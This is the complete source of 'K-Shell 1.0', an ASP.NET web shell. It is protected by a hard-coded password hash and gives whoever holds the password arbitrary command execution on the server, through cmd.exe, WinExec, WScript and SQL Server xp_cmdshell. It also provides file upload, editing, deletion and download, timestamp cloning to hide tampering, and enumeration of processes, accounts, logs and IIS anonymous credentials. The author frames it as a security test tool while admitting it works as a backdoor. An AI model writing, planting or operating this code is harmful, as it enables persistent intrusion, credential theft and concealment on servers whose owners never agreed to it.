kikoo.aspx

<%@ Page Language="VB" ContentType="text/html"  validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ import namespace="System.Threading" %>
<%@ import namespace="System.Text" %>
<%@ import namespace="System.Security.Cryptography" %>
<script runat="server">
Dim PASSWORD as string = "26d49f07ceebca39e994ca12a3b52f2d"   'Hash MD5 of password
'Here , change the default password "kikicoco" to yours
'----------------------------------------------------------------------
'-----------------      K-Shell by kikicoco VHS       -----------------
'-----------------    E-mail: [email protected]    -----------------
'-----------------      http://blog.ajaxviet.com      -----------------
'-----------------        http://vnsecurity.com       -----------------
'-----------------              Version 1.0           -----------------
'-----------------            Build (20070226)        -----------------
'----------- This shell base on WebAdmin2.0(beta) By lake2 ------------
'----------------------------------------------------------------------
'  Description:
'    1. This program run on ASP.NET environment,control the web directory
'    2. It looks like backdoor , but I wish you like it .
'    3. If you have some words to me , please send me a Email
'	 4. This is useful security test tool on windows. I hope that!
'------------
dim url,TEMP1,TEMP2,TITLE as string
Function GetMD5(ByVal strPlain As String) As String
 	Dim UE As UnicodeEncoding = New UnicodeEncoding
 	Dim HashValue As Byte()
 	Dim MessageBytes As Byte() = UE.GetBytes(strPlain)
 	Dim md5 As MD5 = New MD5CryptoServiceProvider
 	Dim strHex As String = ""
 	HashValue = md5.ComputeHash(MessageBytes)
	 For Each b As Byte In HashValue
   	strHex += String.Format("{0:x2}", b)
 	Next
 	Return strHex
End Function
Sub Login_click(sender As Object, E As EventArgs)
	if GetMD5(Textbox.Text)=PASSWORD then
		session("kikicoco")=1
		session.Timeout=45
	else
		response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
	end if
End Sub
'Run w32 shell
Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long

Sub RunCmdW32(Src As Object, E As EventArgs)
	dim command
	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
	If Request.Form("txtCommand1") = "" Then
		command = "dir c:\"
	else
		command = Request.Form("txtCommand1")
	End If
	ExecuteCommand1(command,tempFile)
	OutputTempFile1(tempFile,fileObject)
	'txtCommand1.text=""
End Sub
function ExecuteCommand1(command, tempFile)
	Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
	Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
	Dim FailIfExists

	local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
	local_copy_of_cmd = Local_dir+"cmd.exe"
	Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\smssa.exe"
	CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
	errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
	response.write(errReturn)
	thread.sleep(500)
	end function
Sub OutputTempFile1(tempFile,oFileSys)
	On Error Resume Next
	dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
	resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
   	oFile.Close
   	Call oFileSys.DeleteFile(tempFile, True)
End sub
'End w32 shell
'Run WSH shell
Sub RunCmdWSH(Src As Object, E As EventArgs)
	dim command
	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
	dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
	If Request.Form("txtcommand2") = "" Then
		command = "dir c:\"
	else
		command = Request.Form("txtcommand2")
	End If
	ExecuteCommand2(command,tempFile)
	OutputTempFile2(tempFile,fileObject)
	txtCommand2.text=""
End Sub
Function ExecuteCommand2(cmd_to_execute, tempFile)
	  Dim oScript
	  oScript = Server.CreateObject("WSCRIPT.SHELL")
      Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
End function
Sub OutputTempFile2(tempFile,fileObject)
    On Error Resume Next
	dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
	resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
	oFile.Close
	Call fileObject.DeleteFile(tempFile, True)
End sub
'End WSH shell

'System infor
Sub output_all_environment_variables(mode)
   	Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
   	Dim de As DictionaryEntry
	For Each de In  environmentVariables
	if mode="HTML" then
	response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
	else
	if mode="text"
	response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
	end if
	end if
   	Next
End sub
Sub output_all_Server_variables(mode)
    dim item
    for each item in request.servervariables
	if mode="HTML" then
	response.write("<b>" + item + "</b> : ")
	response.write(request.servervariables(item))
	response.write("<br>")
	else
		if mode="text"
			response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
		end if
	end if
           next
End sub
'End sysinfor

'Begin List processes
Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
		dim fields_split, fields_item,i

		'on error resume next

		table("0","","")
		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)

		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)

		fields_split = split(Fields_to_Show,",")
		for each item in objProcessInfo
			tr
				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
				if Ubound(Fields_split)>0 then
					for i = 1 to ubound(fields_split)
						Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))
					next
				end if
			_tr
		next
End function
Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
		dim fields_split, fields_item,i,count
		newline
		rw("Showing the first " + cstr(MaxCount) + " Entries")
		newline
		newline
		table("1","","")
		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
		_table
		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
'		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)
		objProcessInfo = winObj.InstancesOf(Wmi_Function)

		fields_split = split(Fields_to_Show,",")
		count = 0
		for each item in objProcessInfo
			count = Count + 1
			table("1","","")
			tr
				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
				if Ubound(Fields_split)>0 then
					for i = 1 to ubound(fields_split)
						Surround_by_TD(item.properties_.item(fields_split(i)).value)
					next
				end if
			_tr
			if count > MaxCount then exit for
		next
End function
'End List processes
'Begin IIS_list_Anon_Name_Pass
Sub IIS_list_Anon_Name_Pass()
		Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP

		IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") 			' Create an instance of the IIsComputer object
		providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
		nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting

		Dim MaxCount = 20,Count = 0
		hr
		RW("only showing the first "+cstr(MaxCount) + " items")
		hr
		for each item in nodeObj
			response.write("<b>" + item.AppFriendlyName + " </b> -  ")
			response.write("(" + item.AppPoolId + ") ")

			response.write(item.AnonymousUserName + " : ")
			response.write(item.AnonymousUserPass)

			response.write("<br>")

			response.flush
			Count = Count +1
			If Count > MaxCount then exit for
		next
		hr
End sub
'End IIS_list_Anon_Name_Pass
Sub RunCMD(Src As Object, E As EventArgs)
	Try
	Dim kProcess As New Process()
	Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
	kProcessStartInfo.UseShellExecute = False
	kProcessStartInfo.RedirectStandardOutput = true
	kProcess.StartInfo = kProcessStartInfo
	kProcessStartInfo.Arguments="/c " & Cmd.text
	kProcess.Start()
	Dim myStreamReader As StreamReader = kProcess.StandardOutput
	Dim myString As String = myStreamReader.Readtoend()
	kProcess.Close()
	result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
	Cmd.text=""
	Catch
	result.text="This function has disabled!"
	End Try
End Sub
Sub CloneTime(Src As Object, E As EventArgs)
	existdir(time1.Text)
	existdir(time2.Text)
	Dim thisfile As FileInfo =New FileInfo(time1.Text)
	Dim thatfile As FileInfo =New FileInfo(time2.Text)
	thisfile.LastWriteTime = thatfile.LastWriteTime
	thisfile.LastAccessTime = thatfile.LastAccessTime
	thisfile.CreationTime = thatfile.CreationTime
	response.Write("<font color=""red"">Clone Time Success!</font>")
End Sub
sub Editor(Src As Object, E As EventArgs)
	dim mywrite as new streamwriter(filepath.text,false,encoding.default)
	mywrite.write(content.text)
	mywrite.close
	response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
end sub
Sub UpLoad(Src As Object, E As EventArgs)
	dim filename,loadpath as string
	filename=path.getfilename(UpFile.value)
	loadpath=request.QueryString("src") & filename
	if  file.exists(loadpath)=true then
		response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
		response.End()
	end if
	UpFile.postedfile.saveas(loadpath)
	response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
	response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
End Sub
Sub NewFD(Src As Object, E As EventArgs)
	url=request.form("src")
	if NewFile.Checked = True then
		dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
		mywrite.close
		response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
	else
		directory.createdirectory(url & NewName.Text)
		response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
	end if
End Sub
Sub del(a)
	if right(a,1)="\" then
		dim xdir as directoryinfo
		dim mydir as new DirectoryInfo(a)
		dim xfile as fileinfo
		for each xfile in mydir.getfiles()
			file.delete(a & xfile.name)
		next
		for each xdir in mydir.getdirectories()
			call del(a & xdir.name & "\")
		next
		directory.delete(a)
	else
		file.delete(a)
	end if
End Sub
Sub copydir(a,b)
	dim xdir as directoryinfo
	dim mydir as new DirectoryInfo(a)
	dim xfile as fileinfo
	for each xfile in mydir.getfiles()
		file.copy(a & "\" & xfile.name,b & xfile.name)
	next
	for each xdir in mydir.getdirectories()
		directory.createdirectory(b & path.getfilename(a & xdir.name))
		call copydir(a & xdir.name & "\",b & xdir.name & "\")
	next
End Sub
Sub xexistdir(temp,ow)
	if directory.exists(temp)=true or file.exists(temp)=true then
		if ow=0  then
			response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
		elseif ow=1 then
			del(temp)
		else
			dim d as string = session("cutboard")
			if right(d,1)="\" then
				TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			else
				TEMP2=url & second(now) & replace(path.getfilename(d),"","")
			end if
		end if
	end if
End Sub
Sub existdir(temp)
		if  file.exists(temp)=false and directory.exists(temp)=false then
			response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
			response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
			response.End()
		end if
End Sub
Sub RunSQLCMD(Src As Object, E As EventArgs)
	Dim adoConn,strQuery,recResult,strResult
	if SqlName.Text<>"" then
		adoConn=Server.CreateObject("ADODB.Connection")
		adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
		If Sqlcmd.Text<>"" Then
			strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
	  		recResult = adoConn.Execute(strQuery)
 	 		If NOT recResult.EOF Then
   				Do While NOT recResult.EOF
    				strResult = strResult & chr(13) & recResult(0).value
    				recResult.MoveNext
   				Loop
 	 		End if
  			recResult = Nothing
  			strResult = Replace(strResult," ","&nbsp;")
  			strResult = Replace(strResult,"<","&lt;")
  			strResult = Replace(strResult,">","&gt;")
			resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
			SqlCMD.Text=""
		 End if
  		adoConn.Close
	 End if
 End Sub
Function GetStartedTime(ms)
	GetStartedTime=cint(ms/(1000*60*60))
End function
Function getIP()
    Dim strIPAddr as string
    If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
        strIPAddr = Request.ServerVariables("REMOTE_ADDR")
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
    Else
        strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    End If
    getIP = Trim(Mid(strIPAddr, 1, 30))
End Function
Function Getparentdir(nowdir)
	dim temp,k as integer
	temp=1
	k=0
	if len(nowdir)>4 then
		nowdir=left(nowdir,len(nowdir)-1)
	end if
	do while temp<>0
		k=temp+1
		temp=instr(temp,nowdir,"\")
		if temp =0 then
			exit do
		end if
		temp = temp+1
	loop
	if k<>2 then
		getparentdir=mid(nowdir,1,k-2)
	else
		getparentdir=nowdir
	end if
End function
Function Rename()
	url=request.QueryString("src")
	if file.exists(Getparentdir(url) & request.Form("name")) then
		rename=0
	else
		file.copy(url,Getparentdir(url) & request.Form("name"))
		del(url)
		rename=1
	end if
End Function
Function GetSize(temp)
	if temp < 1024 then
		GetSize=temp & " bytes"
	else
		if temp\1024 < 1024 then
			GetSize=temp\1024 & " KB"
		else
			if temp\1024\1024 < 1024 then
				GetSize=temp\1024\1024 & " MB"
			else
				GetSize=temp\1024\1024\1024 & " GB"
			end if
		end if
	end if
End Function
	Sub downTheFile(thePath)
		dim stream
		stream=server.createObject("adodb.stream")
		stream.open
		stream.type=1
		stream.loadFromFile(thePath)
		response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
		response.addHeader("Content-Length",stream.Size)
		response.charset="UTF-8"
		response.contentType="application/octet-stream"
		response.binaryWrite(stream.read)
		response.flush
		stream.close
		stream=nothing
		response.End()
End Sub
'H T M L  S N I P P E T S
public sub Newline
		response.write("<BR>")
	end sub

	public sub TextNewline
		response.write(vbnewline)
	end sub

	public sub rw(text_to_print)	  ' Response.write
		response.write(text_to_print)
	end sub

	public sub rw_b(text_to_print)
		rw("<b>"+text_to_print+"</b>")
	end sub

	public sub hr()
		rw("<hr>")
	end sub

	public sub ul()
		rw("<ul>")
	end sub

	public sub _ul()
		rw("</ul>")
	end sub

	public sub table(border_size,width,height)
		rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
	end sub

	public sub _table()
		rw("</table>")
	end sub

	public sub tr()
		rw("<tr>")
	end sub

	public sub _tr()
		rw("</tr>")
	end sub

	public sub td()
		rw("<td>")
	end sub

	public sub _td()
		rw("</td>")
	end sub

	public sub td_span(align,name,contents)
		rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
	end sub

	Public sub td_link(align,title,link,target)
		rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
	end sub

	Public sub link(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
	end sub

	Public sub link_hr(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
		hr
	end sub

	Public sub link_newline(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
		newline
	end sub

	public sub empty_Cell(ColSpan)
		rw("<td colspan='"+cstr(colspan)+"'></td>")
	end sub

	public sub empty_row(ColSpan)
		rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
	end sub

       	Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
            dim rowItem

            rowItems = split(rowItems,",")
            response.write("<tr bgcolor="+bgcolor+">")
            for each rowItem in RowItems
                response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
            next
            response.write("</tr>")

        end sub

        Public sub TR_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub


        Public sub Surround_by_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub

        Public sub Surround_by_TD_and_Bold(cellContents)
            response.write("<td><b>")
            response.write(cellContents)
            response.write("</b></td>")
        end sub

        Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
            response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
            response.write(cellContents)
            response.write("</b></font></td>")
        end sub
	Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
		response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
		response.write("    <tr heigth=20>")
		response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
		response.write("    </tr>")
		response.write("    <tr>")
		response.write("      <td>"+main_Cell_contents+"</td>")
		response.write("    </tr>")
		response.write("  </table>")
		response.write("</div>")
	end sub

	Public sub Create_Div_open(top,left,width,height,z_index)
		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
	end sub


	Public sub Create_Div_close()
		response.write("</div>")
	end sub

	public sub Create_Iframe(left, top, width, height, name,src)
		rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")
		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
    		rw("</span>")
	end sub

	public sub Create_Iframe_relative(width, height, name,src)
		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
	end sub

	public sub return_100_percent_table()
		rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
	end sub

	public sub font_size(size)
		rw("<font size="+size+">")
	end sub

	public sub end_font()
		rw("</font>")
	end sub

	public sub red(contents)
		rw("<font color=red>"+contents+"</font>")
	end sub

	public sub yellow(contents)
		rw("<font color='#FF8800'>"+contents+"</font>")
	end sub

	public sub green(contents)
		rw("<font color=green>"+contents+"</font>")
	end sub
	public sub print_var(var_name, var_value,var_description)
		if var_description<> "" Then
			rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
		else
			rw(b_(var_name)+" : " + var_value)
		end if
		newline
	end sub

' Functions

	public function br_()
		br_ = "<br>"
	end function

	public function b_(contents)
		b_ = "<b>"+ contents + "</b>"
	end function

	public function i_(contents)
		i_ = "<i>"+ contents + "</i>"
	end function

	public function li_(contents)
		li_ = "<li>"+ contents + "</li>"
	end function

	public function h1_(contents)
		h1_ = "<h1>"+ contents + "</h1>"
	end function

	public function h2_(contents)
		h2_ = "<h2>"+ contents + "</h2>"
	end function

	public function h3_(contents)
		h3_ = "<h3>"+ contents + "</h3>"
	end function

	public function big_(contents)
		big_ = "<big>"+ contents + "</big>"
	end function

	public function center_(contents)
		center_ = "<center>"+ cstr(contents) + "</center>"
	end function


	public function td_force_width_(width)
		td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
	end function


	public function red_(contents)
		red_ = "<font color=red>"+contents+"</font>"
	end function

	public function yellow_(contents)
		yellow_ = "<font color='#FF8800'>"+contents+"</font>"
	end function

	public function green_(contents)
		green_ = "<font color=green>"+contents+"</font>"
	end function

	Public function link_(title,link,target)
		link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
	end function
'End HTML SNIPPETS
</script>
<%
if request.QueryString("action")="down" and session("kikicoco")=1 then
		downTheFile(request.QueryString("src"))
		response.End()
end if
Dim hu as string = request.QueryString("action")
if hu="cmd" then
TITLE="CMD.NET"
elseif hu="cmdw32" then
TITLE="ASP.NET W32 Shell"
elseif hu="cmdwsh" then
TITLE="ASP.NET WSH Shell"
elseif hu="sqlrootkit" then
TITLE="SqlRootKit.NET"
elseif hu="clonetime" then
TITLE="Clone Time"
elseif hu="information" then
TITLE="Web Server Info"
elseif hu="goto" then
TITLE="K-Shell 1.0"
elseif hu="pro" then
TITLE="List processes from server"
elseif hu="user" then
TITLE="List User Accounts"
elseif hu="applog" then
TITLE="List Application Event Log Entries"
elseif hu="syslog" then
TITLE="List System Event Log Entries"
elseif hu="auser" then
TITLE="IIS List Anonymous' User details"
else
TITLE=request.ServerVariables("HTTP_HOST")
end if
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<style type="text/css">
body,td,th {
	color: #000000;
	font-family: Verdana;
}
body {
	background-color: #ffffff;
	font-size:12px;
}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.style3 {color: #FF0000}
</style>
<head>
<meta http-equiv="Content-Type" content="text/html">
<title><%=TITLE%></title>
</head>
<body>
<div align="center">K-Shell 1.0 By <a href="http://blog.ajaxviet.com" target="_blank" title="Welcome to my page:)">kikicoco</a> from Vietnam [<a href="http://vnsecurity.com" target="_blank">VHS</a>]</div>
<hr>
<%
Dim error_x as Exception
Try
if session("kikicoco")<>1 then
	'response.Write("<br>")
	'response.Write("Hello , thank you for using my program !<br>")
	'response.Write("This program is run at ASP.NET Environment and manage the web directory.<br>")
	'response.Write("Maybe this program looks like a backdoor , but I wish you like it and don't hack :p<br><br>")
	'response.Write("<span class=""style3"">Notice:</span> only click ""Login"" to login.")
%>
<form runat="server">
  Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />
  <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="buttom" />
</form>
<%
else
	dim temp as string
	temp=request.QueryString("action")
	if temp="" then temp="goto"
	select case temp
	case "goto"
		if request.QueryString("src")<>"" then
			url=request.QueryString("src")
		else
			url=server.MapPath(".") & "\"
		end if
	call existdir(url)
	dim xdir as directoryinfo
	dim mydir as new DirectoryInfo(url)
	dim hupo as string
	dim xfile as fileinfo
%>
<table width="90%"  border="0" align="center">
  <tr>
  	<td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
  </tr>
  <tr>
    <td width="13%">Operate:</td>
    <td width="87%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> -
      <%if session("cutboard")<>"" then%>
      <a href="?action=plaster&src=<%=server.UrlEncode(url)%>" title="you can plaster">Paste</a> -
      <%else%>
	Paste -
<%end if%>
<a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit">Quit</a></td>
  </tr>
  <tr>
    <td>
	Go to: </td>
    <td>
<%
dim i as integer
for i =0 to Directory.GetLogicalDrives().length-1
 	response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
next
%>
</td>
  </tr>

  <tr>
    <td>Tool:</td>
    <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro" >List Processes</a></td>
  </tr>
  <tr>
    <td> </td>
    <td><a href="?action=applog" >Application Event Log </a> - <a href="?action=user" >List User Accounts</a> - <a href="?action=syslog" >System Log</a> - <a href="?action=auser" >IIS List Anonymous' User details</a></td>
  </tr>
</table>
<hr>
<table width="90%"  border="0" align="center">
	<tr>
	<td width="40%"><strong>Name</strong></td>
	<td width="15%"><strong>Size</strong></td>
	<td width="20%"><strong>ModifyTime</strong></td>
	<td width="25%"><strong>Operate</strong></td>
	</tr>
      <tr>
        <td><%
		hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
		response.Write(hupo)
		for each xdir in mydir.getdirectories()
			response.Write("<tr>")
			dim filepath as string
			filepath=server.UrlEncode(url & xdir.name)
			hupo= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
			response.Write(hupo)
			response.Write("<td>&lt;dir&gt;</td>")
			response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
			hupo="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
			response.Write(hupo)
			response.Write("</tr>")
		next
		%></td>
  </tr>
		<tr>
        <td><%
		for each xfile in mydir.getfiles()
			dim filepath2 as string
			filepath2=server.UrlEncode(url & xfile.name)
			response.Write("<tr>")
			hupo="<td>" & xfile.name & "</td>"
			response.Write(hupo)
			hupo="<td>" & GetSize(xfile.length) & "</td>"
			response.Write(hupo)
			response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
			hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
			response.Write(hupo)
			response.Write("</tr>")
		next
		response.Write("</table>")
		%></td>
      </tr>
</table>
<script language="javascript">
function del()
{
if(confirm("Are you sure?")){return true;}
else{return false;}
}
function down()
{
if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
else{return false;}
}
</script>
<%
case "information"
	dim CIP,CP as string
	if getIP()<>request.ServerVariables("REMOTE_ADDR") then
			CIP=getIP()
			CP=request.ServerVariables("REMOTE_ADDR")
	else
			CIP=request.ServerVariables("REMOTE_ADDR")
			CP="None"
	end if
%>
<div align=center>[ Web Server Information ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></div><br>
<table width="80%"  border="1" align="center">
  <tr>
    <td width="40%">Server IP</td>
    <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  </tr>
  <tr>
    <td height="73">Machine Name</td>
    <td><%=Environment.MachineName%></td>
  </tr>
  <tr>
    <td>Network Name</td>
    <td><%=Environment.UserDomainName.ToString()%></td>
  </tr>
  <tr>
    <td>User Name in this Process</td>
    <td><%=Environment.UserName%></td>
  </tr>
  <tr>
    <td>OS Version</td>
    <td><%=Environment.OSVersion.ToString()%></td>
  </tr>
  <tr>
    <td>Started Time</td>
    <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  </tr>
  <tr>
    <td>System Time</td>
    <td><%=now%></td>
  </tr>
  <tr>
    <td>IIS Version</td>
    <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  </tr>
  <tr>
    <td>HTTPS</td>
    <td><%=request.ServerVariables("HTTPS")%></td>
  </tr>
  <tr>
    <td>PATH_INFO</td>
    <td><%=request.ServerVariables("PATH_INFO")%></td>
  </tr>
  <tr>
    <td>PATH_TRANSLATED</td>
    <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  <tr>
    <td>SERVER_PORT</td>
    <td><%=request.ServerVariables("SERVER_PORT")%></td>
  </tr>
    <tr>
    <td>SeesionID</td>
    <td><%=Session.SessionID%></td>
  </tr>
  <tr>
    <td colspan="2"><span class="style3">Client Infomation</span></td>
  </tr>
  <tr>
    <td>Client Proxy</td>
    <td><%=CP%></td>
  </tr>
  <tr>
    <td>Client IP</td>
    <td><%=CIP%></td>
  </tr>
  <tr>
    <td>User</td>
    <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  </tr>
</table>
